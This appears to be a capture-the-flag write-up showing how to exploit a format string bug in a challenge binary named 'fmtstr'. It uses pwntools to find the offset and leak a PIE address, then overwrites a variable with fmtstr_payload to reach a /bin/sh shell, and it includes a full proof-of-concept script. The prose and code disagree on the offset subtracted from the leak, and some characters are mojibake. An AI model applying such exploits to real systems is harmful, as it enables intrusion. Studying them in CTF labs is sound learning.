fmtstr
Decompile Main Funcation
The Main funcation is get input from user and print it
in line 4 is There format string bug
and in line 5 there is Condition if the variable shell is not equal to 1 call get_shell funcation this funcation is simple just execute /bin/sh
let me see what protection are enabled on the program
NX,PIE is Enabled
PIE = is protection randomize the funcations and assembly instrucations like aslr but aslr not randomize funcations and assembly instrucations, it only works if aslr protection is enabled
NX = make the stack permission RW without X the make you if there buffer overflow can`t put shellcode and execute it
now try find format string offset
use pwntools to find offset
from pwn import *
io = process("./fmtstr")
context.arch = 'amd64'
elf = context.binary = ELF('fmtstr', checksec=True)
context.log_level = 'info'
def send_payload(payload):
io.sendline(payload)
return io.recvline().strip()
format_string = FmtStr(execute_fmt=send_payload)now run the script
it works the offset is 6
now try leak PIE Base to change shell variable from 1 to any thing to execute /bin/sh
the address number 11 is for _start funcation
βββ(rootπkali)-[~/TestArena]
ββ# ./fmtstr
%11$p
0x560630a5e070now calcute between _start address and pie base to get ELF Base address
now to get pie base just leak address number 11 and subtract 0x1070 from it to get the address
now get shell variable offset to get real address of the variable to change the value from 1 to any thing
now let`s change the value of variable
i Wrote this POC to change the variable value
from pwn import *
io = process("./fmtstr")
context.arch = 'amd64'
elf = context.binary = ELF('fmtstr', checksec=True)
context.log_level = 'info'
def send_payload(payload):
io.sendline(payload)
return io.recvline().strip()
format_string = FmtStr(execute_fmt=send_payload)
io.sendline(b"%11$p")
leak = int(io.recvline().strip(),16) - 0x11d0
log.success(f"ELF Address: {hex(leak)}")
shell = leak + 0x4040
log.success(f"shell: {hex(shell)}")
payload = fmtstr_payload(6, {shell: 0x1337})
io.sendline(payload)
io.interactive()
I Hope you Enjoyed
Last updated